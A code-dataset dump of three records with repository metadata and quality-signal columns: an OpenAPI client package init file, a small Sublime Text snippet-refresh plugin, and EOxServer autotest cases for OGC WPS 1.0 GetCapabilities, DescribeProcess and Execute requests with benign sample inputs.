hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e8b646a6ae1a2b3dadb52c89882bc188e3fde731
| 754
|
py
|
Python
|
clients/python/openapi_client/api/__init__.py
|
Soluto/tweek-openapi-clients
|
feee32006743ea4bb815f2608bd95950439388c3
|
[
"Apache-2.0"
] | null | null | null |
clients/python/openapi_client/api/__init__.py
|
Soluto/tweek-openapi-clients
|
feee32006743ea4bb815f2608bd95950439388c3
|
[
"Apache-2.0"
] | null | null | null |
clients/python/openapi_client/api/__init__.py
|
Soluto/tweek-openapi-clients
|
feee32006743ea4bb815f2608bd95950439388c3
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import absolute_import
# flake8: noqa
# import apis into api package
from openapi_client.api.apps_api import AppsApi
from openapi_client.api.configuraiton_api import ConfiguraitonApi
from openapi_client.api.context_api import ContextApi
from openapi_client.api.dependent_api import DependentApi
from openapi_client.api.keys_api import KeysApi
from openapi_client.api.manifest_api import ManifestApi
from openapi_client.api.policy_api import PolicyApi
from openapi_client.api.revision_history_api import RevisionHistoryApi
from openapi_client.api.schema_api import SchemaApi
from openapi_client.api.search_api import SearchApi
from openapi_client.api.suggestions_api import SuggestionsApi
from openapi_client.api.tags_api import TagsApi
| 41.888889
| 70
| 0.880637
| 109
| 754
| 5.816514
| 0.33945
| 0.208202
| 0.321767
| 0.378549
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001447
| 0.083554
| 754
| 17
| 71
| 44.352941
| 0.916064
| 0.054377
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
e8ca48e3dc47bc2e11eb6fe65125d276cc3a32ac
| 172
|
py
|
Python
|
cacher_refresh.py
|
CacherApp/cacher-sublime
|
d8ac7e65d825d9127b1f3326af4c05b8d41903e2
|
[
"MIT"
] | 13
|
2018-06-20T07:00:15.000Z
|
2022-03-30T07:29:42.000Z
|
cacher_refresh.py
|
CacherApp/cacher-sublime
|
d8ac7e65d825d9127b1f3326af4c05b8d41903e2
|
[
"MIT"
] | null | null | null |
cacher_refresh.py
|
CacherApp/cacher-sublime
|
d8ac7e65d825d9127b1f3326af4c05b8d41903e2
|
[
"MIT"
] | 2
|
2018-08-29T10:45:40.000Z
|
2018-08-29T10:48:28.000Z
|
import sublime_plugin
from .lib import snippets
class CacherRefresh(sublime_plugin.ApplicationCommand):
@staticmethod
def run():
snippets.load_snippets()
| 19.111111
| 55
| 0.755814
| 18
| 172
| 7.055556
| 0.722222
| 0.204724
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.174419
| 172
| 8
| 56
| 21.5
| 0.894366
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
fa1895dfc5c96a79c1d3eb71aeb405ece7f3d33e
| 33,807
|
py
|
Python
|
autotest/autotest_services/tests/wps/test_v10.py
|
kalxas/eoxserver
|
8073447d926f3833923bde7b7061e8a1658dee06
|
[
"OML"
] | 25
|
2015-08-10T19:34:34.000Z
|
2021-02-05T08:28:01.000Z
|
autotest/autotest_services/tests/wps/test_v10.py
|
kalxas/eoxserver
|
8073447d926f3833923bde7b7061e8a1658dee06
|
[
"OML"
] | 153
|
2015-01-20T08:35:49.000Z
|
2022-03-16T11:00:56.000Z
|
autotest/autotest_services/tests/wps/test_v10.py
|
kalxas/eoxserver
|
8073447d926f3833923bde7b7061e8a1658dee06
|
[
"OML"
] | 10
|
2015-01-23T15:48:30.000Z
|
2021-01-21T15:41:18.000Z
|
#-------------------------------------------------------------------------------
#
# Project: EOxServer <http://eoxserver.org>
# Authors: Martin Paces <martin.paces@eox.at>
# Fabian Schindler <fabian.schindler@eox.at>
#
#-------------------------------------------------------------------------------
# Copyright (C) 2014 EOX IT Services GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies of this Software or works derived from this Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#-------------------------------------------------------------------------------
#pylint: disable=missing-docstring,line-too-long,too-many-ancestors
from autotest_services import base as testbase
from autotest_services.tests.wps.base import (
WPS10ExecuteMixIn, ContentTypeCheckMixIn, ContentDispositionCheckMixIn,
WPS10CapabilitiesMixIn,
)
ALLOWED_PROCESSES = [
'TC00:identity:literal',
'TC01:identity:bbox',
'TC02:identity:complex',
'TC03:image_generator:complex',
'TC04:identity:literal:datetime',
'TC05:identity:literal:datetime',
'Test06MinimalValidProcess',
'Test06MinimalAllowedProcess',
'TC07:request-parameter',
]
XML_CONTENT_TYPE = "application/xml; charset=utf-8"
#===============================================================================
# WCS 1.0 GetCapabilities
#===============================================================================
class WPS10GetCapabilitiesValidTestCase(ContentTypeCheckMixIn, WPS10CapabilitiesMixIn, testbase.XMLTestCase):
allowedProcesses = ALLOWED_PROCESSES
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = "service=WPS&version=1.0.0&request=GetCapabilities"
return (params, "kvp")
class WPS10PostGetCapabilitiesValidTestCase(ContentTypeCheckMixIn, WPS10CapabilitiesMixIn, testbase.XMLTestCase):
allowedProcesses = ALLOWED_PROCESSES
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = """<wps:GetCapabilities updateSequence="u2001" service="WPS"
xmlns:wps="http://www.opengis.net/wps/1.0"
xmlns:ows="http://www.opengis.net/ows/1.1">
<ows:AcceptVersions><ows:Version>1.0.0</ows:Version></ows:AcceptVersions>
</wps:GetCapabilities>
"""
return (params, "xml")
#===============================================================================
# WCS 1.0 DescribeProcess
#===============================================================================
class WPS10DescribeProcessValidTestCase(ContentTypeCheckMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = "service=WPS&version=1.0.0&request=DescribeProcess&identifier=TC00:identity:literal"
return (params, "kvp")
class WPS10PostDescribeProcessValidTestCase(ContentTypeCheckMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = """<wps:DescribeProcess service="WPS" version="1.0.0"
xmlns:wps="http://www.opengis.net/wps/1.0"
xmlns:ows="http://www.opengis.net/ows/1.1">
<ows:Identifier>TC00:identity:literal</ows:Identifier>
</wps:DescribeProcess>
"""
return (params, "xml")
class WPS10DescribeProcessValidTC01TestCase(ContentTypeCheckMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = "service=WPS&version=1.0.0&request=DescribeProcess&identifier=TC01:identity:bbox"
return (params, "kvp")
class WPS10DescribeProcessValidTC02TestCase(ContentTypeCheckMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = "service=WPS&version=1.0.0&request=DescribeProcess&identifier=TC02:identity:complex"
return (params, "kvp")
class WPS10DescribeProcessValidTC03TestCase(ContentTypeCheckMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = "service=WPS&version=1.0.0&request=DescribeProcess&identifier=TC03:image_generator:complex"
return (params, "kvp")
class WPS10DescribeProcessTC06MinimalValidProcess(ContentTypeCheckMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = "service=WPS&version=1.0.0&request=DescribeProcess&identifier=Test06MinimalValidProcess"
return (params, "kvp")
class WPS10DescribeProcessTC06MinimalAllowedProcess(ContentTypeCheckMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = "service=WPS&version=1.0.0&request=DescribeProcess&identifier=Test06MinimalAllowedProcess"
return (params, "kvp")
def testValidate(self, XMLData=None):
# NOTE: The minimal process allowed by the implementation is not
# standard compliant as it does not contain any input nor output.
pass
#TODO: Error - invalid process identifier
#===============================================================================
# WCS 1.0 Execute - Minimal Process
#===============================================================================
class WPS10ExecuteTC06MinimalValidProcess(ContentTypeCheckMixIn, WPS10ExecuteMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = "service=WPS&version=1.0.0&request=execute&identifier=Test06MinimalValidProcess&DataInputs=input=TEST&lineage=true"
return (params, "kvp")
class WPS10ExecuteTC06MinimalAllowedProcess(ContentTypeCheckMixIn, WPS10ExecuteMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = "service=WPS&version=1.0.0&request=execute&identifier=Test06MinimalAllowedProcess"
return (params, "kvp")
class WPS10ExecuteTC06MinimalAllowedProcessWithLineage(ContentTypeCheckMixIn, WPS10ExecuteMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = "service=WPS&version=1.0.0&request=execute&identifier=Test06MinimalAllowedProcess&lineage=true"
return (params, "kvp")
#===============================================================================
# WCS 1.0 Execute - Literal Data Tests
#===============================================================================
class WPS10ExecuteTestCase(ContentTypeCheckMixIn, WPS10ExecuteMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = """<wps:Execute version="1.0.0" service="WPS"
xmlns:wps="http://www.opengis.net/wps/1.0.0"
xmlns:ows="http://www.opengis.net/ows/1.1">
<ows:Identifier>TC00:identity:literal</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>input00</ows:Identifier>
<wps:Data>
<wps:LiteralData>Test string.</wps:LiteralData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
</wps:Execute>
"""
return (params, "xml")
class WPS10ExecuteKVPTestCase(ContentTypeCheckMixIn, WPS10ExecuteMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = "service=WPS&version=1.0.0&request=Execute&identifier=TC00:identity:literal&DataInputs=input00=Test+string."
return (params, "kvp")
class WPS10ExecuteKVPSpecialCharactersTestCase(ContentTypeCheckMixIn, WPS10ExecuteMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = "service=WPS&version=1.0.0&request=Execute&identifier=TC00:identity:literal&DataInputs=input00=john.doe%40foo.com%3Brichard.roe%40foo.com"
return (params, "kvp")
class WPS10ExecuteLiteralDataTestCase(ContentTypeCheckMixIn, WPS10ExecuteMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = """<wps:Execute version="1.0.0" service="WPS"
xmlns:wps="http://www.opengis.net/wps/1.0.0"
xmlns:ows="http://www.opengis.net/ows/1.1">
<ows:Identifier>TC00:identity:literal</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>input00</ows:Identifier>
<wps:Data>
<wps:LiteralData>Test string.</wps:LiteralData>
</wps:Data>
</wps:Input>
<wps:Input>
<ows:Identifier>TC00:input02</ows:Identifier>
<wps:Data>
<wps:LiteralData>low</wps:LiteralData>
</wps:Data>
</wps:Input>
<wps:Input>
<ows:Identifier>TC00:input03</ows:Identifier>
<wps:Data>
<wps:LiteralData uom="mm">734</wps:LiteralData>
</wps:Data>
</wps:Input>
<wps:Input>
<ows:Identifier>TC00:input04</ows:Identifier>
<wps:Data>
<wps:LiteralData uom="C">15</wps:LiteralData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:ResponseDocument lineage="true" storeExecuteResponse="false" status="false">
<wps:Output>
<ows:Identifier>output00</ows:Identifier>
<ows:Title>Userdefined title.</ows:Title>
<ows:Abstract>Userdefined abstract.</ows:Abstract>
</wps:Output>
<wps:Output asReference="false" uom="cm">
<ows:Identifier>TC00:output03</ows:Identifier>
</wps:Output>
<wps:Output asReference="false" uom="F">
<ows:Identifier>TC00:output04</ows:Identifier>
</wps:Output>
</wps:ResponseDocument>
</wps:ResponseForm>
</wps:Execute>
"""
return (params, "xml")
class WPS10ExecuteLiteralDataKVPTestCase(ContentTypeCheckMixIn, WPS10ExecuteMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = "service=WPS&version=1.0.0&request=Execute&identifier=TC00:identity:literal&DataInputs=input00=Some+text.;TC00%3Ainput03=123@uom=mm;TC00%3Ainput04=19.5@uom=C&ResponseDocument=TC00%3Aoutput03@uom=cm@asReference=false;TC00%3Aoutput04@uom=F&lineage=true"
return (params, "kvp")
class WPS10ExecuteLiteralDataRawOutputTestCase(ContentTypeCheckMixIn, testbase.PlainTextTestCase):
expectedContentType = "text/plain; charset=utf-8"
def getRequest(self):
params = """<wps:Execute version="1.0.0" service="WPS"
xmlns:wps="http://www.opengis.net/wps/1.0.0"
xmlns:ows="http://www.opengis.net/ows/1.1">
<ows:Identifier>TC00:identity:literal</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>input00</ows:Identifier>
<wps:Data>
<wps:LiteralData>Test string.</wps:LiteralData>
</wps:Data>
</wps:Input>
<wps:Input>
<ows:Identifier>TC00:input04</ows:Identifier>
<wps:Data>
<wps:LiteralData uom="C">15</wps:LiteralData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:RawDataOutput asReference="false" uom="F">
<ows:Identifier>TC00:output04</ows:Identifier>
</wps:RawDataOutput>
</wps:ResponseForm>
</wps:Execute>
"""
# response: 59
return (params, "xml")
class WPS10ExecuteLiteralDataRawOutputKVPTestCase(ContentTypeCheckMixIn, testbase.PlainTextTestCase):
expectedContentType = "text/plain; charset=utf-8"
def getRequest(self):
params = "service=WPS&version=1.0.0&request=Execute&identifier=TC00:identity:literal&DataInputs=input00=Some+text.;TC00%3Ainput04=19.5@uom=C&RawDataOutput=TC00%3Aoutput04@uom=F"
# response: 67.1
return (params, "kvp")
#TODO: Error - malformed XML request
#TODO: Error - malformed KVP request
#TODO: Error - invalid process identifier
#TODO: Error - missing required input
#TODO: Error - invalid input (identifier)
#TODO: Error - invalid input (value type)
#TODO: Error - invalid input (out of the allowed range)
#===============================================================================
# WCS 1.0 Execute - Bounding Box Data Tests
#===============================================================================
class WPS10ExecuteBoundingBoxTestCase(ContentTypeCheckMixIn, WPS10ExecuteMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = """<wps:Execute version="1.0.0" service="WPS"
xmlns:wps="http://www.opengis.net/wps/1.0.0"
xmlns:ows="http://www.opengis.net/ows/1.1">
<ows:Identifier>TC01:identity:bbox</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>TC01:input00</ows:Identifier>
<wps:Data>
<wps:BoundingBoxData crs="EPSG:4326">
<ows:LowerCorner>0 1</ows:LowerCorner>
<ows:UpperCorner>2 3</ows:UpperCorner>
</wps:BoundingBoxData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:ResponseDocument lineage="true" storeExecuteResponse="false" status="false" />
</wps:ResponseForm>
</wps:Execute>
"""
return (params, "xml")
class WPS10ExecuteBoundingBoxKVPTestCase(ContentTypeCheckMixIn, WPS10ExecuteMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = "service=WPS&version=1.0.0&request=Execute&identifier=TC01:identity:bbox&DataInputs=TC01:input00=0,1,2,3,urn:ogc:def:crs:EPSG::4326&lineage=true"
return (params, "kvp")
class WPS10ExecuteBoundingBoxRawOutputTestCase(ContentTypeCheckMixIn, testbase.PlainTextTestCase):
expectedContentType = "text/plain"
def getRequest(self):
params = """<wps:Execute version="1.0.0" service="WPS"
xmlns:wps="http://www.opengis.net/wps/1.0.0"
xmlns:ows="http://www.opengis.net/ows/1.1">
<ows:Identifier>TC01:identity:bbox</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>TC01:input00</ows:Identifier>
<wps:Data>
<wps:BoundingBoxData crs="http://www.opengis.net/def/crs/EPSG/0/4326">
<ows:LowerCorner>0 1</ows:LowerCorner>
<ows:UpperCorner>2 3</ows:UpperCorner>
</wps:BoundingBoxData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:RawDataOutput>
<ows:Identifier>TC01:output00</ows:Identifier>
</wps:RawDataOutput>
</wps:ResponseForm>
</wps:Execute>
"""
# response: 0,1,2,3,http://www.opengis.net/def/crs/EPSG/0/4326
return (params, "xml")
class WPS10ExecuteBoundingBoxRawOutputKVPTestCase(ContentTypeCheckMixIn, testbase.PlainTextTestCase):
expectedContentType = "text/plain"
def getRequest(self):
params = "service=WPS&version=1.0.0&request=Execute&identifier=TC01:identity:bbox&DataInputs=TC01:input00=0,1,2,3,ImageCRS&RawDataOutput=TC01:output00"
# response: 0,1,2,3,ImageCRS
return (params, "kvp")
#TODO: Error - invalid input CRS
#TODO: Error - invalid output CRS
#===============================================================================
# WCS 1.0 Execute - Complex Data Tests (text-based payload)
#===============================================================================
class WPS10ExecuteComplexDataTextTestCase(ContentTypeCheckMixIn, WPS10ExecuteMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = """<wps:Execute version="1.0.0" service="WPS"
xmlns:wps="http://www.opengis.net/wps/1.0.0"
xmlns:ows="http://www.opengis.net/ows/1.1">
<ows:Identifier>TC02:identity:complex</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>TC02:input00</ows:Identifier>
<wps:Data>
<wps:ComplexData>Sample
text
complex
payload.</wps:ComplexData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
</wps:Execute>
"""
return (params, "xml")
class WPS10ExecuteComplexDataJSONTestCase(ContentTypeCheckMixIn, WPS10ExecuteMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = """<wps:Execute version="1.0.0" service="WPS"
xmlns:wps="http://www.opengis.net/wps/1.0.0"
xmlns:ows="http://www.opengis.net/ows/1.1">
<ows:Identifier>TC02:identity:complex</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>TC02:input00</ows:Identifier>
<wps:Data>
<wps:ComplexData mimeType="application/json">{"numbers":[1,2,3,1.23456789012345678901e-124],"string":"Hallo world!"}</wps:ComplexData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:ResponseDocument lineage="true">
<wps:Output mimeType="application/json">
<ows:Identifier>TC02:output00</ows:Identifier>
</wps:Output>
</wps:ResponseDocument>
</wps:ResponseForm>
</wps:Execute>
"""
return (params, "xml")
class WPS10ExecuteComplexDataXMLTestCase(ContentTypeCheckMixIn, WPS10ExecuteMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = """<wps:Execute version="1.0.0" service="WPS"
xmlns:wps="http://www.opengis.net/wps/1.0.0"
xmlns:ows="http://www.opengis.net/ows/1.1">
<ows:Identifier>TC02:identity:complex</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>TC02:input00</ows:Identifier>
<wps:Data>
<wps:ComplexData mimeType="text/xml">
<test:testXML xmlns:test="http://xml.eox.at/test" />
</wps:ComplexData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:ResponseDocument lineage="true">
<wps:Output mimeType="text/xml">
<ows:Identifier>TC02:output00</ows:Identifier>
</wps:Output>
</wps:ResponseDocument>
</wps:ResponseForm>
</wps:Execute>
"""
return (params, "xml")
class WPS10ExecuteComplexDataTextKVPTestCase(ContentTypeCheckMixIn, WPS10ExecuteMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = "service=WPS&version=1.0.0&request=Execute&identifier=TC02:identity:complex&DataInputs=TC02:input00=P%C5%99%C3%ADli%C5%A1%20%C5%BElu%C5%A5ou%C4%8Dk%C3%BD%20k%C5%AF%C5%88%20%C3%BAp%C4%9Bl%20%C4%8F%C3%A1belsk%C3%A9%20%C3%B3dy.&lineage=true"
return (params, "kvp")
class WPS10ExecuteComplexDataJSONKVPTestCase(ContentTypeCheckMixIn, WPS10ExecuteMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = "service=WPS&version=1.0.0&request=Execute&identifier=TC02:identity:complex&DataInputs=TC02:input00={%22text%22:%22P%C5%99%C3%ADli%C5%A1%20%C5%BElu%C5%A5ou%C4%8Dk%C3%BD%20k%C5%AF%C5%88%20%C3%BAp%C4%9Bl%20%C4%8F%C3%A1belsk%C3%A9%20%C3%B3dy.%22}@mimeType=application%2Fjson&ResponseDocument=TC02:output00@mimeType=application%2Fjson&lineage=true"
return (params, "kvp")
class WPS10ExecuteComplexDataXMLKVPTestCase(ContentTypeCheckMixIn, WPS10ExecuteMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = "service=WPS&version=1.0.0&request=Execute&identifier=TC02:identity:complex&DataInputs=TC02:input00=%3Ctest%3AtestXML+xmlns%3Atest%3D%22http%3A%2F%2Fxml.eox.at%2Ftest%22%3EP%C5%99%C3%ADli%C5%A1%20%C5%BElu%C5%A5ou%C4%8Dk%C3%BD%20k%C5%AF%C5%88%20%C3%BAp%C4%9Bl%20%C4%8F%C3%A1belsk%C3%A9%20%C3%B3dy.%3C%2Ftest%3AtestXML%3E@mimeType=text%2Fxml&ResponseDocument=TC02:output00@mimeType=text%2Fxml&lineage=true"
return (params, "kvp")
class WPS10ExecuteComplexDataTextRawOutputTestCase(ContentTypeCheckMixIn, ContentDispositionCheckMixIn, testbase.PlainTextTestCase):
expectedContentType = "text/plain; charset=utf-8"
expectedContentDisposition = 'attachment; filename="test02_identity_complex.txt"'
def getRequest(self):
params = """<wps:Execute version="1.0.0" service="WPS"
xmlns:wps="http://www.opengis.net/wps/1.0.0"
xmlns:ows="http://www.opengis.net/ows/1.1">
<ows:Identifier>TC02:identity:complex</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>TC02:input00</ows:Identifier>
<wps:Data>
<wps:ComplexData>Sample
text
complex
payload.</wps:ComplexData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:RawDataOutput>
<ows:Identifier>TC02:output00</ows:Identifier>
</wps:RawDataOutput>
</wps:ResponseForm>
</wps:Execute>
"""
return (params, "xml")
class WPS10ExecuteComplexDataJSONRawOutputTestCase(ContentTypeCheckMixIn, ContentDispositionCheckMixIn, testbase.JSONTestCase):
expectedContentType = "application/json; charset=utf-8"
expectedContentDisposition = 'attachment; filename="test02_identity_complex.json"'
def getRequest(self):
params = """<wps:Execute version="1.0.0" service="WPS"
xmlns:wps="http://www.opengis.net/wps/1.0.0"
xmlns:ows="http://www.opengis.net/ows/1.1">
<ows:Identifier>TC02:identity:complex</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>TC02:input00</ows:Identifier>
<wps:Data>
<wps:ComplexData mimeType="application/json">{"numbers":[1,2,3,1.23456789012345678901e-124],"string":"Hallo world!"}</wps:ComplexData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:RawDataOutput mimeType="application/json">
<ows:Identifier>TC02:output00</ows:Identifier>
</wps:RawDataOutput>
</wps:ResponseForm>
</wps:Execute>
"""
return (params, "xml")
